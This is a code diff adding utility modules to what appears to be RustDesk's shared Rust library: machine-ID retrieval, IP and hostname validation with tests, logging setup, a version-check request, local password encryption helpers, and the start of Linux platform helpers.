+            static INIT: std::sync::Once = std::sync::Once::new();
+            INIT.call_once(|| {
+                // Keep in sync with upstream handling:
+                // https://github.com/rustdesk/rustdesk/blob/85db6779828349b23ca3eba91cc7cd36c5337797/src/common.rs#L822
+                let username = whoami::username().trim_end_matches('\0').to_owned();
+                let max_retries = if username == "root" { 16 } else { 8 };
+                for i in 0..max_retries {
+                    match machine_uid::get() {
+                        Ok(id) => {
+                            let _ = CACHED_MACHINE_UID.set(id.into());
+                            return;
+                        }
+                        Err(e) => {
+                            log::error!("Failed to get machine uid in macOS retry #{i}: {e}");
+                        }
+                    }
+                    std::thread::sleep(std::time::Duration::from_millis(50));
+                }
+            });
+        }
+
+        if let Some(uid) = CACHED_MACHINE_UID.get() {
+            return uid.clone();
+        }
+
+        match machine_uid::get() {
+            Ok(id) => {
+                let uid: Vec<u8> = id.into();
+                let _ = CACHED_MACHINE_UID.set(uid.clone());
+                return uid;
+            }
+            Err(e) => {
+                if LOG_COUNT
+                    .fetch_update(Ordering::SeqCst, Ordering::SeqCst, |count| {
+                        (count < 30).then_some(count + 1)
+                    })
+                    .is_ok()
+                {
+                    log::error!("Failed to get machine uid: {e}");
+                }
+            }
+        }
+    }
+    Config::get_key_pair().1
+}
+
+#[inline]
+pub fn get_time() -> i64 {
+    std::time::SystemTime::now()
+        .duration_since(std::time::UNIX_EPOCH)
+        .map(|d| d.as_millis())
+        .unwrap_or(0) as _
+}
+
+#[inline]
+pub fn is_ipv4_str(id: &str) -> bool {
+    if let Ok(reg) = regex::Regex::new(
+        r"^(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)(:\d+)?$",
+    ) {
+        reg.is_match(id)
+    } else {
+        false
+    }
+}
+
+#[inline]
+pub fn is_ipv6_str(id: &str) -> bool {
+    if let Ok(reg) = regex::Regex::new(
+        r"^((([a-fA-F0-9]{1,4}:{1,2})+[a-fA-F0-9]{1,4})|(\[([a-fA-F0-9]{1,4}:{1,2})+[a-fA-F0-9]{1,4}\]:\d+))$",
+    ) {
+        reg.is_match(id)
+    } else {
+        false
+    }
+}
+
+#[inline]
+pub fn is_ip_str(id: &str) -> bool {
+    is_ipv4_str(id) || is_ipv6_str(id)
+}
+
+#[inline]
+pub fn is_domain_port_str(id: &str) -> bool {
+    // modified regex for RFC1123 hostname. check https://stackoverflow.com/a/106223 for original version for hostname.
+    // according to [TLD List](https://data.iana.org/TLD/tlds-alpha-by-domain.txt) version 2023011700,
+    // there is no digits in TLD, and length is 2~63.
+    if let Ok(reg) = regex::Regex::new(
+        r"(?i)^([a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?\.)+[a-z][a-z-]{0,61}[a-z]:\d{1,5}$",
+    ) {
+        reg.is_match(id)
+    } else {
+        false
+    }
+}
+
+pub fn init_log(_is_async: bool, _name: &str) -> Option<flexi_logger::LoggerHandle> {
+    static INIT: std::sync::Once = std::sync::Once::new();
+    #[allow(unused_mut)]
+    let mut logger_holder: Option<flexi_logger::LoggerHandle> = None;
+    INIT.call_once(|| {
+        #[cfg(debug_assertions)]
+        {
+            use env_logger::*;
+            init_from_env(Env::default().filter_or(DEFAULT_FILTER_ENV, "info,reqwest=warn,rustls=warn,webrtc-sctp=warn,webrtc=warn"));
+        }
+        #[cfg(not(debug_assertions))]
+        {
+            // https://docs.rs/flexi_logger/latest/flexi_logger/error_info/index.html#write
+            // though async logger more efficient, but it also causes more problems, disable it for now
+            let mut path = config::Config::log_path();
+            #[cfg(target_os = "android")]
+            if !config::Config::get_home().exists() {
+                return;
+            }
+            if !_name.is_empty() {
+                path.push(_name);
+            }
+            use flexi_logger::*;
+            if let Ok(x) = Logger::try_with_env_or_str("debug,reqwest=warn,rustls=warn,webrtc-sctp=warn,webrtc=warn") {
+                logger_holder = x
+                    .log_to_file(FileSpec::default().directory(path))
+                    .write_mode(if _is_async {
+                        WriteMode::Async
+                    } else {
+                        WriteMode::Direct
+                    })
+                    .format(opt_format)
+                    .rotate(
+                        Criterion::Age(Age::Day),
+                        Naming::Timestamps,
+                        Cleanup::KeepLogFiles(31),
+                    )
+                    .start()
+                    .ok();
+            }
+        }
+    });
+    logger_holder
+}
+
+#[derive(Debug, Default, Deserialize, Serialize)]
+pub struct VersionCheckRequest {
+    #[serde(default)]
+    pub os: String,
+    #[serde(default)]
+    pub os_version: String,
+    #[serde(default)]
+    pub arch: String,
+    #[serde(default)]
+    pub device_id: Vec<u8>,
+    #[serde(default)]
+    pub typ: String,
+}
+
+#[derive(Debug, Default, Deserialize, Serialize)]
+pub struct VersionCheckResponse {
+    #[serde(default)]
+    pub url: String,
+}
+
+pub const VER_TYPE_RUSTDESK_CLIENT: &str = "rustdesk-client";
+pub const VER_TYPE_RUSTDESK_SERVER: &str = "rustdesk-server";
+
+pub fn version_check_request(typ: String) -> (VersionCheckRequest, String) {
+    const URL: &str = "https://api.rustdesk.com/version/latest";
+
+    use sysinfo::System;
+    let system = System::new();
+    let os = system.distribution_id();
+    let os_version = system.os_version().unwrap_or_default();
+    let arch = std::env::consts::ARCH.to_string();
+    #[allow(deprecated)]
+    let device_id = fingerprint::get_fingerprint(None, None);
+    (
+        VersionCheckRequest {
+            os,
+            os_version,
+            arch,
+            device_id,
+            typ,
+        },
+        URL.to_string(),
+    )
+}
+
+pub fn time_based_rand() -> u32 {
+    let nanos = std::time::SystemTime::now()
+        .duration_since(std::time::UNIX_EPOCH)
+        .unwrap()
+        .as_nanos();
+
+    let mut x = nanos as u64;
+    x ^= x << 13;
+    x ^= x >> 7;
+    x ^= x << 17;
+
+    (x % 32768) as u32
+}
+
+#[cfg(test)]
+mod test {
+    use super::*;
+
+    #[test]
+    fn test_mangle() {
+        let addr = SocketAddr::V4(SocketAddrV4::new(Ipv4Addr::new(192, 168, 16, 32), 21116));
+        assert_eq!(addr, AddrMangle::decode(&AddrMangle::encode(addr)));
+
+        let addr = "[2001:db8::1]:8080".parse::<SocketAddr>().unwrap();
+        assert_eq!(addr, AddrMangle::decode(&AddrMangle::encode(addr)));
+
+        let addr = "[2001:db8:ff::1111]:80".parse::<SocketAddr>().unwrap();
+        assert_eq!(addr, AddrMangle::decode(&AddrMangle::encode(addr)));
+    }
+
+    #[test]
+    fn test_allow_err() {
+        allow_err!(Err("test err") as Result<(), &str>);
+        allow_err!(
+            Err("test err with msg") as Result<(), &str>,
+            "prompt {}",
+            "failed"
+        );
+    }
+
+    #[test]
+    fn test_ipv6() {
+        assert!(is_ipv6_str("1:2:3"));
+        assert!(is_ipv6_str("[ab:2:3]:12"));
+        assert!(is_ipv6_str("[ABEF:2a:3]:12"));
+        assert!(!is_ipv6_str("[ABEG:2a:3]:12"));
+        assert!(!is_ipv6_str("1[ab:2:3]:12"));
+        assert!(!is_ipv6_str("1.1.1.1"));
+        assert!(is_ip_str("1.1.1.1"));
+        assert!(!is_ipv6_str("1:2:"));
+        assert!(is_ipv6_str("1:2::0"));
+        assert!(is_ipv6_str("[1:2::0]:1"));
+        assert!(!is_ipv6_str("[1:2::0]:"));
+        assert!(!is_ipv6_str("1:2::0]:1"));
+    }
+
+    #[test]
+    fn test_ipv4() {
+        assert!(is_ipv4_str("1.2.3.4"));
+        assert!(is_ipv4_str("1.2.3.4:90"));
+        assert!(is_ipv4_str("192.168.0.1"));
+        assert!(is_ipv4_str("0.0.0.0"));
+        assert!(is_ipv4_str("255.255.255.255"));
+        assert!(!is_ipv4_str("256.0.0.0"));
+        assert!(!is_ipv4_str("256.256.256.256"));
+        assert!(!is_ipv4_str("1:2:"));
+        assert!(!is_ipv4_str("192.168.0.256"));
+        assert!(!is_ipv4_str("192.168.0.1/24"));
+        assert!(!is_ipv4_str("192.168.0."));
+        assert!(!is_ipv4_str("192.168..1"));
+    }
+
+    #[test]
+    fn test_hostname_port() {
+        assert!(!is_domain_port_str("a:12"));
+        assert!(!is_domain_port_str("a.b.c:12"));
+        assert!(is_domain_port_str("test.com:12"));
+        assert!(is_domain_port_str("test-UPPER.com:12"));
+        assert!(is_domain_port_str("some-other.domain.com:12"));
+        assert!(!is_domain_port_str("under_score:12"));
+        assert!(!is_domain_port_str("a@bc:12"));
+        assert!(!is_domain_port_str("1.1.1.1:12"));
+        assert!(!is_domain_port_str("1.2.3:12"));
+        assert!(!is_domain_port_str("1.2.3.45:12"));
+        assert!(!is_domain_port_str("a.b.c:123456"));
+        assert!(!is_domain_port_str("---:12"));
+        assert!(!is_domain_port_str(".:12"));
+        // todo: should we also check for these edge cases?
+        // out-of-range port
+        assert!(is_domain_port_str("test.com:0"));
+        assert!(is_domain_port_str("test.com:98989"));
+    }
+
+    #[test]
+    fn test_mangle2() {
+        let addr = "[::ffff:127.0.0.1]:8080".parse().unwrap();
+        let addr_v4 = "127.0.0.1:8080".parse().unwrap();
+        assert_eq!(AddrMangle::decode(&AddrMangle::encode(addr)), addr_v4);
+        assert_eq!(
+            AddrMangle::decode(&AddrMangle::encode("[::127.0.0.1]:8080".parse().unwrap())),
+            addr_v4
+        );
+        assert_eq!(AddrMangle::decode(&AddrMangle::encode(addr_v4)), addr_v4);
+        let addr_v6 = "[ef::fe]:8080".parse().unwrap();
+        assert_eq!(AddrMangle::decode(&AddrMangle::encode(addr_v6)), addr_v6);
+        let addr_v6 = "[::1]:8080".parse().unwrap();
+        assert_eq!(AddrMangle::decode(&AddrMangle::encode(addr_v6)), addr_v6);
+    }
+
+    #[test]
+    fn test_get_version_number() {
+        assert_eq!(get_version_number("1.1.10"), 1001100);
+        assert_eq!(get_version_number("1.1.10-1"), 1001101);
+        assert_eq!(get_version_number("1.1.11-1"), 1001111);
+        assert_eq!(get_version_number("1.2.3"), 1002030);
+    }
+}

--- a/libs/hbb_common/src/mem.rs
+++ b/libs/hbb_common/src/mem.rs
@@ -1,0 +1,14 @@
+/// SAFETY: the returned Vec must not be resized or reserverd
+pub unsafe fn aligned_u8_vec(cap: usize, align: usize) -> Vec<u8> {
+    use std::alloc::*;
+
+    let layout =
+        Layout::from_size_align(cap, align).expect("invalid aligned value, must be power of 2");
+    unsafe {
+        let ptr = alloc(layout);
+        if ptr.is_null() {
+            panic!("failed to allocate {} bytes", cap);
+        }
+        Vec::from_raw_parts(ptr, 0, cap)
+    }
+}

--- a/libs/hbb_common/src/password_security.rs
+++ b/libs/hbb_common/src/password_security.rs
@@ -1,0 +1,474 @@
+use crate::config::Config;
+use sodiumoxide::base64;
+use std::sync::{Arc, RwLock};
+
+lazy_static::lazy_static! {
+    pub static ref TEMPORARY_PASSWORD:Arc<RwLock<String>> = Arc::new(RwLock::new(get_auto_password()));
+}
+
+#[derive(Debug, Clone, Copy, PartialEq, Eq)]
+enum VerificationMethod {
+    OnlyUseTemporaryPassword,
+    OnlyUsePermanentPassword,
+    UseBothPasswords,
+}
+
+#[derive(Debug, Clone, Copy, PartialEq, Eq)]
+pub enum ApproveMode {
+    Both,
+    Password,
+    Click,
+}
+
+fn get_auto_password() -> String {
+    let len = temporary_password_length();
+    if Config::get_bool_option(crate::config::keys::OPTION_ALLOW_NUMERNIC_ONE_TIME_PASSWORD) {
+        Config::get_auto_numeric_password(len)
+    } else {
+        Config::get_auto_password(len)
+    }
+}
+
+// Should only be called in server
+pub fn update_temporary_password() {
+    *TEMPORARY_PASSWORD.write().unwrap() = get_auto_password();
+}
+
+// Should only be called in server
+pub fn temporary_password() -> String {
+    TEMPORARY_PASSWORD.read().unwrap().clone()
+}
+
+fn verification_method() -> VerificationMethod {
+    let method = Config::get_option("verification-method");
+    if method == "use-temporary-password" {
+        VerificationMethod::OnlyUseTemporaryPassword
+    } else if method == "use-permanent-password" {
+        VerificationMethod::OnlyUsePermanentPassword
+    } else {
+        VerificationMethod::UseBothPasswords // default
+    }
+}
+
+pub fn temporary_password_length() -> usize {
+    let length = Config::get_option("temporary-password-length");
+    if length == "8" {
+        8
+    } else if length == "10" {
+        10
+    } else {
+        6 // default
+    }
+}
+
+pub fn temporary_enabled() -> bool {
+    verification_method() != VerificationMethod::OnlyUsePermanentPassword
+}
+
+pub fn permanent_enabled() -> bool {
+    verification_method() != VerificationMethod::OnlyUseTemporaryPassword
+}
+
+pub fn has_valid_password() -> bool {
+    temporary_enabled() && !temporary_password().is_empty()
+        || permanent_enabled() && Config::has_permanent_password()
+}
+
+pub fn approve_mode() -> ApproveMode {
+    let mode = Config::get_option("approve-mode");
+    if mode == "password" {
+        ApproveMode::Password
+    } else if mode == "click" {
+        ApproveMode::Click
+    } else {
+        ApproveMode::Both
+    }
+}
+
+pub fn hide_cm() -> bool {
+    approve_mode() == ApproveMode::Password
+        && verification_method() == VerificationMethod::OnlyUsePermanentPassword
+        && crate::config::option2bool("allow-hide-cm", &Config::get_option("allow-hide-cm"))
+}
+
+const VERSION_LEN: usize = 2;
+
+// Check if data is already encrypted by verifying:
+// 1) version prefix "00"
+// 2) valid base64 payload
+// 3) decoded payload length >= secretbox::MACBYTES
+//
+// We intentionally avoid trying to decrypt here because key mismatch would cause
+// false negatives.
+// Reference: secretbox::seal returns ciphertext length = plaintext length + MACBYTES
+// https://github.com/sodiumoxide/sodiumoxide/blob/3057acb1a030ad86ed8892a223d64036ab5e8523/src/crypto/secretbox/xsalsa20poly1305.rs#L67
+fn is_encrypted(v: &[u8]) -> bool {
+    if v.len() <= VERSION_LEN || !v.starts_with(b"00") {
+        return false;
+    }
+    match base64::decode(&v[VERSION_LEN..], base64::Variant::Original) {
+        Ok(decoded) => decoded.len() >= sodiumoxide::crypto::secretbox::MACBYTES,
+        Err(_) => false,
+    }
+}
+
+pub fn encrypt_str_or_original(s: &str, version: &str, max_len: usize) -> String {
+    if is_encrypted(s.as_bytes()) {
+        log::error!("Duplicate encryption!");
+        return s.to_owned();
+    }
+    if s.chars().count() > max_len {
+        return String::default();
+    }
+    if version == "00" {
+        if let Ok(s) = encrypt(s.as_bytes()) {
+            return version.to_owned() + &s;
+        }
+    }
+    s.to_owned()
+}
+
+// String: password
+// bool: whether decryption is successful
+// bool: whether should store to re-encrypt when load
+// note: s.len() return length in bytes, s.chars().count() return char count
+//       &[..2] return the left 2 bytes, s.chars().take(2) return the left 2 chars
+pub fn decrypt_str_or_original(s: &str, current_version: &str) -> (String, bool, bool) {
+    if s.len() > VERSION_LEN {
+        if s.starts_with("00") {
+            if let Ok(v) = decrypt(s[VERSION_LEN..].as_bytes()) {
+                return (
+                    String::from_utf8_lossy(&v).to_string(),
+                    true,
+                    "00" != current_version,
+                );
+            }
+        }
+    }
+
+    // For values that already look encrypted (version prefix + base64), avoid
+    // repeated store on each load when decryption fails.
+    (
+        s.to_owned(),
+        false,
+        !s.is_empty() && !is_encrypted(s.as_bytes()),
+    )
+}
+
+pub fn encrypt_vec_or_original(v: &[u8], version: &str, max_len: usize) -> Vec<u8> {
+    if is_encrypted(v) {
+        log::error!("Duplicate encryption!");
+        return v.to_owned();
+    }
+    if v.len() > max_len {
+        return vec![];
+    }
+    if version == "00" {
+        if let Ok(s) = encrypt(v) {
+            let mut version = version.to_owned().into_bytes();
+            version.append(&mut s.into_bytes());
+            return version;
+        }
+    }
+    v.to_owned()
+}
+
+// Vec<u8>: password
+// bool: whether decryption is successful
+// bool: whether should store to re-encrypt when load
+pub fn decrypt_vec_or_original(v: &[u8], current_version: &str) -> (Vec<u8>, bool, bool) {
+    if v.len() > VERSION_LEN {
+        let version = String::from_utf8_lossy(&v[..VERSION_LEN]);
+        if version == "00" {
+            if let Ok(v) = decrypt(&v[VERSION_LEN..]) {
+                return (v, true, version != current_version);
+            }
+        }
+    }
+
+    // For values that already look encrypted (version prefix + base64), avoid
+    // repeated store on each load when decryption fails.
+    (v.to_owned(), false, !v.is_empty() && !is_encrypted(v))
+}
+
+fn encrypt(v: &[u8]) -> Result<String, ()> {
+    if !v.is_empty() {
+        symmetric_crypt(v, true).map(|v| base64::encode(v, base64::Variant::Original))
+    } else {
+        Err(())
+    }
+}
+
+fn decrypt(v: &[u8]) -> Result<Vec<u8>, ()> {
+    if !v.is_empty() {
+        base64::decode(v, base64::Variant::Original).and_then(|v| symmetric_crypt(&v, false))
+    } else {
+        Err(())
+    }
+}
+
+pub fn symmetric_crypt(data: &[u8], encrypt: bool) -> Result<Vec<u8>, ()> {
+    use sodiumoxide::crypto::secretbox;
+    use std::convert::TryInto;
+
+    let uuid = crate::get_uuid();
+    let mut keybuf = uuid.clone();
+    keybuf.resize(secretbox::KEYBYTES, 0);
+    let key = secretbox::Key(keybuf.try_into().map_err(|_| ())?);
+    let nonce = secretbox::Nonce([0; secretbox::NONCEBYTES]);
+
+    if encrypt {
+        Ok(secretbox::seal(data, &nonce, &key))
+    } else {
+        let res = secretbox::open(data, &nonce, &key);
+        #[cfg(not(any(target_os = "android", target_os = "ios")))]
+        if res.is_err() {
+            // Fallback: try pk if uuid decryption failed (in case encryption used pk due to machine_uid failure)
+            if let Some(key_pair) = Config::get_existing_key_pair() {
+                let pk = key_pair.1;
+                if pk != uuid {
+                    let mut keybuf = pk;
+                    keybuf.resize(secretbox::KEYBYTES, 0);
+                    let pk_key = secretbox::Key(keybuf.try_into().map_err(|_| ())?);
+                    return secretbox::open(data, &nonce, &pk_key);
+                }
+            }
+        }
+        res
+    }
+}
+
+mod test {
+
+    #[test]
+    fn test() {
+        use super::*;
+        use rand::{thread_rng, Rng};
+        use std::time::Instant;
+
+        let version = "00";
+        let max_len = 128;
+
+        println!("test str");
+        let data = "1ü1111";
+        let encrypted = encrypt_str_or_original(data, version, max_len);
+        let (decrypted, succ, store) = decrypt_str_or_original(&encrypted, version);
+        println!("data: {data}");
+        println!("encrypted: {encrypted}");
+        println!("decrypted: {decrypted}");
+        assert_eq!(data, decrypted);
+        assert_eq!(version, &encrypted[..2]);
+        assert!(succ);
+        assert!(!store);
+        let (_, _, store) = decrypt_str_or_original(&encrypted, "99");
+        assert!(store);
+        assert!(!decrypt_str_or_original(&decrypted, version).1);
+        assert_eq!(
+            encrypt_str_or_original(&encrypted, version, max_len),
+            encrypted
+        );
+
+        println!("test vec");
+        let data: Vec<u8> = "1ü1111".as_bytes().to_vec();
+        let encrypted = encrypt_vec_or_original(&data, version, max_len);
+        let (decrypted, succ, store) = decrypt_vec_or_original(&encrypted, version);
+        println!("data: {data:?}");
+        println!("encrypted: {encrypted:?}");
+        println!("decrypted: {decrypted:?}");
+        assert_eq!(data, decrypted);
+        assert_eq!(version.as_bytes(), &encrypted[..2]);
+        assert!(!store);
+        assert!(succ);
+        let (_, _, store) = decrypt_vec_or_original(&encrypted, "99");
+        assert!(store);
+        assert!(!decrypt_vec_or_original(&decrypted, version).1);
+        assert_eq!(
+            encrypt_vec_or_original(&encrypted, version, max_len),
+            encrypted
+        );
+
+        println!("test original");
+        let data = version.to_string() + "Hello World";
+        let (decrypted, succ, store) = decrypt_str_or_original(&data, version);
+        assert_eq!(data, decrypted);
+        assert!(store);
+        assert!(!succ);
+        let verbytes = version.as_bytes();
+        let data: Vec<u8> = vec![verbytes[0], verbytes[1], 1, 2, 3, 4, 5, 6];
+        let (decrypted, succ, store) = decrypt_vec_or_original(&data, version);
+        assert_eq!(data, decrypted);
+        assert!(store);
+        assert!(!succ);
+        let (_, succ, store) = decrypt_str_or_original("", version);
+        assert!(!store);
+        assert!(!succ);
+        let (_, succ, store) = decrypt_vec_or_original(&[], version);
+        assert!(!store);
+        assert!(!succ);
+        let data = "1ü1111";
+        assert_eq!(decrypt_str_or_original(data, version).0, data);
+        let data: Vec<u8> = "1ü1111".as_bytes().to_vec();
+        assert_eq!(decrypt_vec_or_original(&data, version).0, data);
+
+        // Base64-shaped "00" prefixed values shorter than MACBYTES are treated
+        // as original/plain values and should be stored.
+        let data = "00YWJjZA==";
+        let (decrypted, succ, store) = decrypt_str_or_original(data, version);
+        assert_eq!(decrypted, data);
+        assert!(!succ);
+        assert!(store);
+        let data = b"00YWJjZA==".to_vec();
+        let (decrypted, succ, store) = decrypt_vec_or_original(&data, version);
+        assert_eq!(decrypted, data);
+        assert!(!succ);
+        assert!(store);
+
+        // When decoded length reaches MACBYTES, it is treated as encrypted-like
+        // and should not trigger repeated store.
+        let exact_mac = vec![0u8; sodiumoxide::crypto::secretbox::MACBYTES];
+        let exact_mac_b64 =
+            sodiumoxide::base64::encode(&exact_mac, sodiumoxide::base64::Variant::Original);
+        let data = format!("00{exact_mac_b64}");
+        let (_, succ, store) = decrypt_str_or_original(&data, version);
+        assert!(!succ);
+        assert!(!store);
+        let data = data.into_bytes();
+        let (_, succ, store) = decrypt_vec_or_original(&data, version);
+        assert!(!succ);
+        assert!(!store);
+
+        println!("test speed");
+        let test_speed = |len: usize, name: &str| {
+            let mut data: Vec<u8> = vec![];
+            let mut rng = thread_rng();
+            for _ in 0..len {
+                data.push(rng.gen_range(0..255));
+            }
+            let start: Instant = Instant::now();
+            let encrypted = encrypt_vec_or_original(&data, version, len);
+            assert_ne!(data, decrypted);
+            let t1 = start.elapsed();
+            let start = Instant::now();
+            let (decrypted, _, _) = decrypt_vec_or_original(&encrypted, version);
+            let t2 = start.elapsed();
+            assert_eq!(data, decrypted);
+            println!("{name}");
+            println!("encrypt:{:?}, decrypt:{:?}", t1, t2);
+
+            let start: Instant = Instant::now();
+            let encrypted = base64::encode(&data, base64::Variant::Original);
+            let t1 = start.elapsed();
+            let start = Instant::now();
+            let decrypted = base64::decode(&encrypted, base64::Variant::Original).unwrap();
+            let t2 = start.elapsed();
+            assert_eq!(data, decrypted);
+            println!("base64, encrypt:{:?}, decrypt:{:?}", t1, t2,);
+        };
+        test_speed(128, "128");
+        test_speed(1024, "1k");
+        test_speed(1024 * 1024, "1M");
+        test_speed(10 * 1024 * 1024, "10M");
+        test_speed(100 * 1024 * 1024, "100M");
+    }
+
+    #[test]
+    fn test_is_encrypted() {
+        use super::*;
+        use sodiumoxide::base64::{encode, Variant};
+        use sodiumoxide::crypto::secretbox;
+
+        // Empty data should not be considered encrypted
+        assert!(!is_encrypted(b""));
+        assert!(!is_encrypted(b"0"));
+        assert!(!is_encrypted(b"00"));
+
+        // Data without "00" prefix should not be considered encrypted
+        assert!(!is_encrypted(b"01abcd"));
+        assert!(!is_encrypted(b"99abcd"));
+        assert!(!is_encrypted(b"hello world"));
+
+        // Data with "00" prefix but invalid base64 should not be considered encrypted
+        assert!(!is_encrypted(b"00!!!invalid base64!!!"));
+        assert!(!is_encrypted(b"00@#$%"));
+
+        // Data with "00" prefix and valid base64 but shorter than MACBYTES is not encrypted
+        assert!(!is_encrypted(b"00YWJjZA==")); // "abcd" in base64
+        assert!(!is_encrypted(b"00SGVsbG8gV29ybGQ=")); // "Hello World" in base64
+
+        // Data with "00" prefix and valid base64 with decoded len == MACBYTES is considered encrypted
+        let exact_mac = vec![0u8; secretbox::MACBYTES];
+        let exact_mac_b64 = encode(&exact_mac, Variant::Original);
+        let exact_mac_candidate = format!("00{exact_mac_b64}");
+        assert!(is_encrypted(exact_mac_candidate.as_bytes()));
+
+        // Real encrypted data should be detected
+        let version = "00";
+        let max_len = 128;
+        let encrypted_str = encrypt_str_or_original("1", version, max_len);
+        assert!(is_encrypted(encrypted_str.as_bytes()));
+        let encrypted_vec = encrypt_vec_or_original(b"1", version, max_len);
+        assert!(is_encrypted(&encrypted_vec));
+
+        // Original unencrypted data should not be detected as encrypted
+        assert!(!is_encrypted(b"1"));
+        assert!(!is_encrypted("1".as_bytes()));
+    }
+
+    #[test]
+    fn test_encrypted_payload_min_len_macbytes() {
+        use super::*;
+        use sodiumoxide::base64::{decode, Variant};
+        use sodiumoxide::crypto::secretbox;
+
+        let version = "00";
+        let max_len = 128;
+
+        let encrypted_str = encrypt_str_or_original("1", version, max_len);
+        let decoded = decode(&encrypted_str.as_bytes()[VERSION_LEN..], Variant::Original).unwrap();
+        assert!(
+            decoded.len() >= secretbox::MACBYTES,
+            "decoded encrypted payload must be at least MACBYTES"
+        );
+
+        let encrypted_vec = encrypt_vec_or_original(b"1", version, max_len);
+        let decoded = decode(&encrypted_vec[VERSION_LEN..], Variant::Original).unwrap();
+        assert!(
+            decoded.len() >= secretbox::MACBYTES,
+            "decoded encrypted payload must be at least MACBYTES"
+        );
+    }
+
+    // Test decryption fallback when data was encrypted with key_pair but decryption tries machine_uid first
+    #[test]
+    #[cfg(not(any(target_os = "android", target_os = "ios")))]
+    fn test_decrypt_with_pk_fallback() {
+        use sodiumoxide::crypto::secretbox;
+        use std::convert::TryInto;
+
+        let uuid = crate::get_uuid();
+        let pk = crate::config::Config::get_key_pair().1;
+
+        // Ensure uuid != pk, otherwise fallback branch won't be tested
+        if uuid == pk {
+            eprintln!("skip: uuid == pk, fallback branch won't be tested");
+            return;
+        }
+
+        let data = b"test password 123";
+        let nonce = secretbox::Nonce([0; secretbox::NONCEBYTES]);
+
+        // Encrypt with pk (simulating machine_uid failure during encryption)
+        let mut pk_keybuf = pk;
+        pk_keybuf.resize(secretbox::KEYBYTES, 0);
+        let pk_key = secretbox::Key(pk_keybuf.try_into().unwrap());
+        let encrypted = secretbox::seal(data, &nonce, &pk_key);
+
+        // Decrypt using symmetric_crypt (should fallback to pk since uuid differs)
+        let decrypted = super::symmetric_crypt(&encrypted, false);
+        assert!(
+            decrypted.is_ok(),
+            "Decryption with pk fallback should succeed"
+        );
+        assert_eq!(decrypted.unwrap(), data);
+    }
+}

--- a/libs/hbb_common/src/platform/linux.rs
+++ b/libs/hbb_common/src/platform/linux.rs
@@ -1,0 +1,572 @@
+use crate::ResultType;
+use std::{
+    collections::HashMap,
+    path::{Path, PathBuf},
+    process::Command,
+};
+use users::{get_current_uid, get_user_by_uid, os::unix::UserExt};
+
+use sctk::{
+    output::OutputData,
+    output::{OutputHandler, OutputState},
+    reexports::client::protocol::wl_output::WlOutput,
+    reexports::client::{globals, Proxy},
+    reexports::client::{Connection, QueueHandle},
+    registry::{ProvidesRegistryState, RegistryState},
+};
+
+lazy_static::lazy_static! {
+    pub static ref DISTRO: Distro = Distro::new();
+}
+
+// to-do: There seems to be some runtime issue that causes the audit logs to be generated.
+// We may need to fix this and remove this workaround in the future.
+//
+// We use the pre-search method to find the command path to avoid the audit logs on some systems.
+// No idea why the audit logs happen.
+// Though the audit logs may disappear after rebooting.
+//
+// See https://github.com/rustdesk/rustdesk/discussions/11959
+//
+// `ausearch -x /usr/share/rustdesk/rustdesk` will return
+// ...
+// time->Tue Jun 24 10:40:43 2025
+// type=PROCTITLE msg=audit(1750776043.446:192757): proctitle=2F7573722F62696E2F727573746465736B002D2D73657276696365
+// type=PATH msg=audit(1750776043.446:192757): item=0 name="/usr/local/bin/sh" nametype=UNKNOWN cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0 cap_frootid=0
+// type=CWD msg=audit(1750776043.446:192757): cwd="/"
+// type=SYSCALL msg=audit(1750776043.446:192757): arch=c000003e syscall=59 success=no exit=-2 a0=7fb7dbd22da0 a1=1d65f2c0 a2=7ffc25193360 a3=7ffc25194ec0 items=1 ppid=172208 pid=267565 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="rustdesk" exe="/usr/share/rustdesk/rustdesk" subj=unconfined key="processos_criados"
+// ----
+// time->Tue Jun 24 10:40:43 2025
+// type=PROCTITLE msg=audit(1750776043.446:192758): proctitle=2F7573722F62696E2F727573746465736B002D2D73657276696365
+// type=PATH msg=audit(1750776043.446:192758): item=0 name="/usr/sbin/sh" nametype=UNKNOWN cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0 cap_frootid=0
+// ...
+lazy_static::lazy_static! {
+    pub static ref CMD_LOGINCTL: String = find_cmd_path("loginctl");
+    pub static ref CMD_PS: String = find_cmd_path("ps");
+    pub static ref CMD_SH: String = find_cmd_path("sh");
+}
+
+pub const DISPLAY_SERVER_WAYLAND: &str = "wayland";
+pub const DISPLAY_SERVER_X11: &str = "x11";
+pub const DISPLAY_DESKTOP_KDE: &str = "KDE";
+
+pub const XDG_CURRENT_DESKTOP: &str = "XDG_CURRENT_DESKTOP";
+
+pub struct Distro {
+    pub name: String,
+    pub version_id: String,
+}
+
+impl Distro {
+    fn new() -> Self {
+        let name = run_cmds("awk -F'=' '/^NAME=/ {print $2}' /etc/os-release")
+            .unwrap_or_default()
+            .trim()
+            .trim_matches('"')
+            .to_string();
+        let version_id = run_cmds("awk -F'=' '/^VERSION_ID=/ {print $2}' /etc/os-release")
+            .unwrap_or_default()
+            .trim()
+            .trim_matches('"')
+            .to_string();
+        Self { name, version_id }
+    }
+}
+
+fn find_cmd_path(cmd: &'static str) -> String {
+    let test_cmd = format!("/bin/{}", cmd);
+    if std::path::Path::new(&test_cmd).exists() {
+        return test_cmd;
+    }
+    let test_cmd = format!("/usr/bin/{}", cmd);
+    if std::path::Path::new(&test_cmd).exists() {
+        return test_cmd;
+    }
+    if let Ok(output) = Command::new("which").arg(cmd).output() {
+        if output.status.success() {
+            return String::from_utf8_lossy(&output.stdout).trim().to_string();
+        }
+    }
+    cmd.to_string()
+}
+
+// Deprecated. Use `hbb_common::platform::linux::is_kde_session()` instead for now.
+// Or we need to set the correct environment variable in the server process.
+#[inline]
+pub fn is_kde() -> bool {
+    if let Ok(env) = std::env::var(XDG_CURRENT_DESKTOP) {
+        env == DISPLAY_DESKTOP_KDE
+    } else {
+        false
+    }
+}
+
+// Don't use `hbb_common::platform::linux::is_kde()` here.
+// It's not correct in the server process.
+pub fn is_kde_session() -> bool {
+    std::process::Command::new(CMD_SH.as_str())
+        .arg("-c")
+        .arg("pgrep -f kded[0-9]+")
